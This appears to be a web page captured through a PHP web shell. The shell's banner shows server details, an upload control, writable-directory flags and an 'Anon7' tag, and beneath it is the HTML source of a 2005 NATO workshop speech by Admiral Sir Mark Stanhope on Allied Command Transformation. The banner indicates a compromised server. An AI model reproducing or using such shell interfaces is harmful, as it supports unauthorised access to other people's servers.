KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/roger.dnai/2005book/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/roger.dnai/2005book/stanhope.htm
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/2005_book.dwt" codeOutsideHTMLIsLocked="false" -->
<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="doctitle" -->
<title>Center for Strategic Decision Research, Peter Struck, Michele Alliot-Marie, General George Joulwan, SACEUR, General James L. Jones, SHAPE, NATO, EU, BDLI, ILA, EADS, Northrop Grumman, Under Secretary Michael Wynne, Assistant Secretary Linton Wells, Ambassador William Burns, NATO Military Committee Chairman General Harald Kujat, General Dynamics, Boeing, Global Security Terrorism, Iraq, Afghanistan, Rainer Hertrich, David Stafford</title>
<!-- InstanceEndEditable --><link rel="stylesheet" href="../2002Book/emx_nav_right.css" type="text/css">
<style type="text/css">
<!--
.style5 {font-weight: bold;
	color: #000000;
	font-family: Arial, Helvetica, sans-serif;
	font-size: large;
}
.style7 {font-size: 2px}
.style8 {font-family: Arial, Helvetica, sans-serif}
.style17 {
	font-size: x-small;
	font-weight: bold;
}
.style18 {font-size: x-small}
.style217 {font-family: Verdana, Arial, Helvetica, sans-serif}
.style219 {font-style: normal; font-weight: normal; font-family: Verdana, Arial, Helvetica, sans-serif; }
.style19 {font-size: 11px}
.style20 {
	color: #006699;
	font-size: large;
}
.style21 {font-size: small}
.style22 {font-family: Arial, Helvetica, sans-serif; font-size: small; }
-->
</style>
<!-- InstanceBeginEditable name="head" -->
<style type="text/css">
<!--
.style30 {font-size: small; font-weight: bold; color: #006699; }
.style34 {
	font-size: medium;
	color: #006699;
}
.style35 {
	font-size: large;
	font-weight: bold;
	color: #006699;
}
.style36 {
	font-size: medium;
	font-weight: bold;
	color: #006699;
}
-->
</style>
<!-- InstanceEndEditable -->
</head>
<body> 
<div class="skipLinks">skip to: <a href="#content">page content</a> | <a href="../2002Book/pageNav">links on this page</a> | <a href="#globalNav">site navigation</a> | <a href="#siteInfo">footer (site information)</a> </div>
<div id="masthead"> 
  <h1 align="center" id="siteName"><strong>Center for Strategic Decision Research</strong></h1> 
  <div id="globalNav">    <div id="globalLink"> 
      <a href="../index.html" id="gl1" class="glink"><span class="style18"><span class="style19">Home</span></span></a><a href="alliotmarie.htm" id="gl2" class="glink"><span class="style18"><span class="style19">Paris '05</span></span></a><a href="../2004book/PeterStruckKeynote.htm" id="gl2" class="glink"><span class="style18"><span class="style19">Berlin '04</span></span></a><a href="../moscow03/weissingerbaylon.htm" id="gl3" class="glink"><span class="style18"><span class="style19">Moscow '03</span></span></a><a href="../berlin02/scharping.htm" id="gl4" class="glink"><span class="style18"><span class="style19">Berlin '02</span></span></a><a href="../2001Book/workshop2001.htm" id="gl5" class="glink"><span class="style18"><span class="style19">Helsingor '01</span></span></a><a href="../2000Book/workshop2000.htm" id="gl6" class="glink"><span class="style18"><span class="style19">Berlin '00</span></span></a><a href="../99Book/workshop1999.htm" id="gl6" class="glink"><span class="style18"><span class="style19">Budapest '99</span></span></a><a href="../98Book/workshop98.htm" id="gl6" class="glink"><span class="style18"><span class="style19">Vienna '98</span></span></a><a href="../97Book/workshop97.htm" id="gl6" class="glink"><span class="style18"><span class="style19">Prague '97</span></span></a><a href="../96Book/Workshop96.htm" id="gl6" class="glink"><span class="style18"><span class="style19">Warsaw '96</span></span></a><a href="../95Book/95Workshop.htm" id="gl7" class="glink"><span class="style18"><span class="style19">Dresden '95</span></span></a> 
    </div> 
    <!--end globalLinks--> 
  </div> 
  <!-- end globalNav --> 
  
 

</div> 
<!-- end masthead --> 
<div id="pagecell1"> 
  <!--pagecell1--> 
  <div id="breadCrumb"><br>
    <table width="614" border="0" align="center">
      <tr>
        <td width="66" height="68"><p><img src="../2004book/logo-kevin-web.jpg" width="60" height="66"></p>        </td>
        <td width="538"><div align="center"><span class="style5">22nd International Workshop on Global Security<br>
<em>Chantilly/Paris, 10-12 June 2005 </em><br>
        </span></div></td>
      </tr>
    </table>
  </div> 
  <div class="style7" id="pageName">    P</div> 
  <div id="pageNav">  
    <div id="sectionLinks">
      <p align="center" class="style17"><strong>Table of Contents</strong></p>
      <p align="left" class="style17"><span class="style18"><span class="style219"> </span><span class="style219"><a href="preface.htm">Preface</a></span></span></p>
      <p align="center" class="style17">Part 1 </p>
      <p align="left" class="style17"><a href="alliotmarie.htm">French Defense Minister Michele Alliot-Marie (English version) </a><span class="style217"><strong></strong></span><span class="style217"><strong><a href="alliotmarie-french.htm">French Defense Minister Michele Alliot-Marie (French version) </a><a href="reid.htm">UK Defense Minister John Reid</a></strong></span><span class="style217"><strong><a href="graham.htm">Canadian Defense Minister Bill Graham </a></strong></span><span class="style219"><a href="weissingerbaylon.htm">Workshop Chairman Dr. Roger Weissinger-Baylon </a></span><span class="style219"> </span><span class="style219"><a href="liska.htm">Slovak Defense Minister Juraj Liska </a></span><span class="style219"><a href="erjavec.htm">Slovenian Defense Minister Karl Erjavec </a></span><span class="style219"> </span><span class="style219"><a href="svinarov.htm">Bulgarian Defense Minister Nikolay Svinarov </a></span><span class="style219"><a href="kujat.htm">NATO Military Committee Chair Gen Harald Kujat </a></span><span class="style219"> </span><span class="style219"><a href="koenig.htm">Acting US Ambassador to NATO John Koenig </a></span><span class="style219"><a href="schuwirth.htm">SHAPE Chief of Staff Gen Rainer Schuwirth </a></span><span class="style219"> </span><span class="style219"><a href="back.htm">Allied Joint Force Command Brunssum Cmdr Gen Gerhard Back </a></span></p>
      <p align="center" class="style17">Part 2 </p>
      <p align="left" class="style17"><span class="style219"><a href="perrindebrichambaut.htm">French MOD Dir for Strat Affairs Amb Marc Perrin de Brichambaut </a></span><span class="style219"> </span><span class="style219"><a href="dipaola.htm">Italian Chief of Defense Adm Giampaolo Di Paola </a></span><span class="style219"><a href="naumann.htm">fmr German Chief of Defense Gen  Klaus Naumann </a></span><span class="style219"> </span><span class="style219"><a href="perruche.htm">EU Military Staff Director Gen Jean-Paul Perruche </a></span><span class="style219"><a href="klein.htm">US Assist to Secretary of Defense Dale Klein </a></span><span class="style219"> </span><span class="style219"><a href="gergorin.htm">EADS Exec Vice President Jean-Louis Gergorin </a></span><span class="style219"><a href="george.htm">UK Parliament Member Bruce George </a></span><span class="style219"> </span><span class="style219"><a href="ranque.htm">Thales Chairman &amp; CEO Denis Ranque</a></span><span class="style219"><a href="tarasyuk.htm">Ukranian Foreign Minister Borys Tarasyuk </a></span><span class="style219"> </span><span class="style219"><a href="fasslabend.htm">Austrian Natl Assembly Member Minister Werner Fasslabend</a></span><span class="style219"><a href="pickering.htm">Boeing Sr Vice President Amb Thomas Pickering</a></span><a href="rooseveltinstitution.htm">Roosevelt Institution </a></p>
      <p align="center" class="style17">Part 3 </p>
      <p align="left" class="style17"><span class="style219"> </span><span class="style219"><a href="auroy.htm">French MOD DGA Force Systems &amp; Cooperation Director Patrick Auroy </a></span><span class="style219"><a href="lind.htm">Swedish Natl Armaments Director Jan-Olof Lind </a></span><span class="style219"> </span><span class="style219"><a href="weise.htm">German Armaments Dir Hans-Heinrich Weise </a></span><span class="style219"><a href="volkman.htm">US Under Secretary of Defense Office Intl Coop Director Alfred Volkman </a></span><span class="style219"> </span><span class="style219"><a href="stanhope.htm">Dep Supreme Allied Cmdr Transformation Admiral Sir Mark Stanhope </a></span><span class="style219"><a href="lahoud.htm">MBDA President &amp; CEO Marwan Lahoud </a></span><span class="style219"> </span><span class="style219"><a href="courtot.htm">SAFRAN Sr Vice President Francois Courtot </a></span><span class="style219"><a href="bertolone.htm">Alenia Aeronautica CEO Giovanni Bertolone </a></span><span class="style219"> </span><span class="style219"><a href="harris.htm">Lockheed Martin President Scott Harris </a></span><span class="style219"><a href="schneider.htm">Northrop Grumman President Kent Schneider </a></span><span class="style219"> </span><span class="style219"><a href="wells.htm">US Assist Secretary of Defense Linton Wells </a></span><span class="style219"><a href="vice.htm">Northrop Grumman Vice President Thomas Vice</a></span></p>
      <p align="center" class="style17">Part 4 </p>
      <p align="left" class="style17"><span class="style219"> </span><span class="style219"><a href="novotny.htm">Czech Ambassador to India Jaromir Novotny </a></span><span class="style219"><a href="rinkevics.htm">Latvian MOD State Secretary Edgars Rinkevics</a></span><span class="style219"><a href="plangu.htm">Romanian MOD State Secretary for Policy Ion Mircea Plangu </a></span><span class="style219"> </span><span class="style219"><a href="kouts.htm">Estonian Defense Forces Cmdr Adm Tarmo Kouts </a></span><br>
        <br>
      </p>
    </div>
  </div> 
  <div id="content">
    <div class="story"><!-- InstanceBeginEditable name="EditRegion1" --><br>
     <!-- Start of StatCounter Code -->
<script type="text/javascript">
var sc_project=3086157; 
var sc_invisible=0; 
var sc_partition=27; 
var sc_security="33bf0688"; 
</script>

<script type="text/javascript" src="http://www.statcounter.com/counter/counter_xhtml.js"></script><noscript><div class="statcounter"><a class="statcounter" href="http://www.statcounter.com/"><img class="statcounter" src="http://c28.statcounter.com/3086157/0/33bf0688/0/" alt="free website hit counter" /></a></div></noscript>
<!-- End of StatCounter Code -->
      <div class="story">
        <h1 align="center" class="style35">Allied Command Transformation<br>
          <br>
        </h1>
        <div align="center">
          <table width="0" border="0">
            <tr>
              <td width="78"> <img width="75" height="98" src="stanhope_clip_image002.jpg"> </td>
              <td width="1">&nbsp;</td>
              <td width="383"><div align="center"><span class="style34">Admiral Sir Mark Stanhope, KCB OBE<br>
  Deputy Supreme Allied Commander Transformation</span></div></td>
            </tr>
                  </table>
        </div>
        <p class="style21">What I propose to do in this  presentation is to give you a clear understanding of Allied Command  Transformation (ACT) and its focus on capability development. We in ACT serve  two customers, namely ACO (the operational commander in Mons) and the member nations. Our purpose is  to provide insight into the future, identify transformational needs and thereby  the capabilities required to fulfill them. Admiral Giambastiani is very clear  that our business is to make those two entities successful. ACT&rsquo;s success is  governed by the success we generate in our member nations and in ACO. &nbsp; </p>
        <p align="center" class="style36">DIFFERING VIEWS OF TRANSFORMATION&nbsp; </p>
        <p class="style21">As far as transformation  goes, I am absolutely clear in my mind that transformation is about doing  business in a smarter way, and that requires leveraging modern technology. But  just as importantly, in fact in many respects more importantly, it requires  leveraging modern thinking. That means looking at new concepts, at new  doctrines that do not cost-adjust intellectually. It also means thinking about  transformation differently. The word &ldquo;transformation&rdquo; implies that you go from  A to B to arrive at your destination. That is not the mindset we are trying to  generate. Rather we are trying to generate that we live in a changing world  that will continue to change, and that though we may have milestones in our  transformation journey, the journey is never-ending. We are always going to  need to see what the future holds and learn what we have to do to meet it.  Therefore, although ACT may be a contemporary organization for changing the Alliance, we can&rsquo;t all  sit back and relax after a change; I am afraid I have to make you much more  uncomfortable.&nbsp; </p>
        <p class="style21">Transformation is about  looking at how we can move from where we were in the Cold War, i.e., doing  business as an Alliance at the borders of Germany as  individual nations in our own sectors. We have to move from that way of doing  business to a very much more integrated, interoperable, smarter approach&mdash;one in  which all our Services work collaboratively. We must also seek those  capabilities that the future requires us to have.&nbsp; </p>
        <p class="style21">We are very focused now on  transforming the military elements of the Alliance.  That does not mean that we can&rsquo;t occasionally&mdash;and Admiral Giambastiani does  this quite a bit&mdash;reach out of our sandbox and gather views about how business  can be done more smartly within NATO headquarters. We in ACT are transforming  the body of NATO, the muscle arm and through it we are also influencing the bit  above the neck, which we think of as the political part of NATO.&nbsp; </p>
        <p class="style21">There are several different  views of transformation. As a European in ACT, based in America, it is  very easy for me to be labelled with a Stars-and-Stripes package. Some nations  believe that the U.S. is  trying to change the Alliance to look a lot more  like America.  But let me summarise what I have seen over the last year. The U.S. has the  resources to experiment and see what may make things better in the future;  their resources are not limitless, but they are vast compared with the EU  contribution and therefore they can experiment across a wide area and take  risks. Some results will be very different from those expected. In the U.S. these are  not seen as failures. In Europe, however, we  are constrained by resources, and therefore must focus our experiments on  almost certainties. We conduct risk-free experiments that guarantee a positive  almost already known result. In doing so we constrain our experimental  scope.&nbsp; </p>
        <p align="center" class="style36">AMERICAN AND EUROPEAN MINDSETS&nbsp; </p>
        <p class="style21">The American and European  mindsets are also very different. The U.S., I think, is very much focused  on technological solutions to many of the problems. We in Europe  have a more balanced view&mdash;that technology is important but there must also be a  more pragmatic and cheaper way of doing business. We are more sceptical and  believe we should continue in a pragmatic way until the technology is there and  stares us in the face. We are not willing to take as many risks. Many people  believe that the U.S.  is after a gold-plated solution, and indeed it is the only nation that can  afford a gold-plated solution. In Europe, the  question is, &lsquo;what is the minimum we can buy into?&rsquo; &nbsp;&lsquo;How low can we place  the capability bar?&rsquo; &nbsp;That is how, in my view, the two groups are looking  to do business together. We must all recognize the differences and be ready to  negotiate within them.&nbsp; </p>
        <p align="center" class="style36">CAPABILITY DEVELOPMENT WITHIN ACT&nbsp; </p>
        <p class="style21">Capability development is  our raison d&rsquo;&ecirc;tre. When ACT was created and the NATO Response Force formed, it  was determined that the NRF would be the mechanism through which we would try  and incrementally improve the capabilities of the Alliance. We would keep raising the bar of  capability for entry into the NRF and experiment within it to see what we could  do to do business much better. We in ACT have now created a Capability  Management Framework against which we will develop capability in clearly  defined areas. We will use a bottom-up and a top-down approach. We will look at  requirements by addressing the capability needs of each mission type, look at  what that might mean in capability terms, and then see what new capabilities  are required. We will cascade down from requirement to capability and then  develop those capabilities to provide them to our customers. We will look at  the lessons identified from current operations, look at ACO&rsquo;s needs and  demands, and work our capability development from those points as well.&nbsp; </p>
        <p class="style21">Defence planning is a very  important area of our focus. We have got to make our planning process smarter  in order to meet the needs of the expeditionary Alliance of the future. Already, in the less  than two years of our existence, we have made significant changes to the  bi-annual process of looking at how defence planning takes place within the Alliance. During the last  Defence Requirements Review (DRR), we looked very closely at force numbers, at  the logistics that are required to support an expeditionary force, and at  whether we in the Alliance  can generate the necessary forces to meet the level of ambition. We have also  looked at armament requirements and at command-and-control packages. There is  more to do here, but we have produced a much more informed DRR in 2005 than we  have ever done before, and it will come before the Military Committee very  shortly.&nbsp; </p>
        <p class="style21">Another area we looked at,  which is a sensitive area, is Resources. Nations can have sufficient forces in  their arsenals, but we need to look at whether or not they can afford to take  these forces off the shelf and send them out to do business. The usability of  forces is something that I think is very important to assess as part of the  defence planning process.&nbsp; </p>
        <p align="center" class="style36">OBJECTIVES AND CHALLENGES&nbsp; </p>
        <p class="style21">I would like to conclude  with just two points: The cataloguing of how we do business and a few  challenges that are out there.&nbsp; </p>
        <p class="style21">When we were created the  Military Committee asked us to write a document called the Strategic Vision.  This document, a joint ACO/ACT document, looks out 15 years and asks: &ldquo;What are  the likely challenges the Alliance  will need to meet and what capabilities will be needed to meet them?&rdquo; From this  document have come three goals for our transformation journey: Coherent effect,  decision superiority, and deployment and sustainment. And out of those have  cascaded what we call our seven Transformational Objective Areas: &nbsp; </p>
        <ul type="disc" class="style21">
          <li>Effective Engagement&nbsp; </li>
          <li>Joint Manoeuvre&nbsp; </li>
          <li>Enhanced CIMIC&nbsp; </li>
          <li>Decision Superiority&nbsp; </li>
          <li>NATO Network-Enabled Capability&nbsp; </li>
          <li>Expeditionary Operations&nbsp; </li>
          <li>Integrated Logistics&nbsp; </li>
        </ul>
        <p class="style21">Klaus Naumann brought these  objectives up as areas we should be focusing upon, and I am glad to say we are.<strong>&nbsp;</strong> </p>
        <p class="style21">There are a number of  challenges in our work, but given the time constraints I&rsquo;ll focus on only one  here: The simple one of resources. ACT is new; it was budgeted as if it was a  rebirth of SACLANT with a completely different mission, but it was given the  same amount of money. While expectations are high, the resources given to us  are low. Therefore we have a lot of unsatisfied ambition out there, and we need  to quantify it and expose it to nations. Our Headquarters is doing exactly  that. We are, however, continuing to push as hard as we can to ensure the  transformational success of ACO and our member nations.&nbsp; </p>
        <p class="style21">&nbsp;</p>
        <p class="style21">&nbsp;</p>
        <h1 align="center" class="style30">&nbsp;</h1>
      </div>
	  <!-- OPENTRACKER HTML START -->
<script defer src="http://server1.opentracker.net/?site=www.csdr.org"></script><noscript><a href="http://www.opentracker.net" target="_blank"><img src="http://img.opentracker.net/?cmd=nojs&site=www.csdr.org" alt="clickstream tracking" border="0"></a> </noscript>
<!-- OPENTRACKER HTML END -->
    <!-- InstanceEndEditable --></div> 
    <div class="story">
      <table width="100%" cellpadding="0" cellspacing="0" summary=""> 
        <tr valign="top"> 
          <td class="storyLeft"> <p>&nbsp; 
            </p></td> 
        </tr> 
      </table> 
    </div> 
  </div> 
  <!--end content --> 
  <div class="style8" id="siteInfo">    <a href="#">Top of page </a> | <a href="../index.html">Home</a> | &copy;2003
    Center for Strategic Decision Research</div> 
</div> 
<!--end pagecell1--> 
<br> 
</body>
<!-- InstanceEnd --></html>

Anon7 - 2021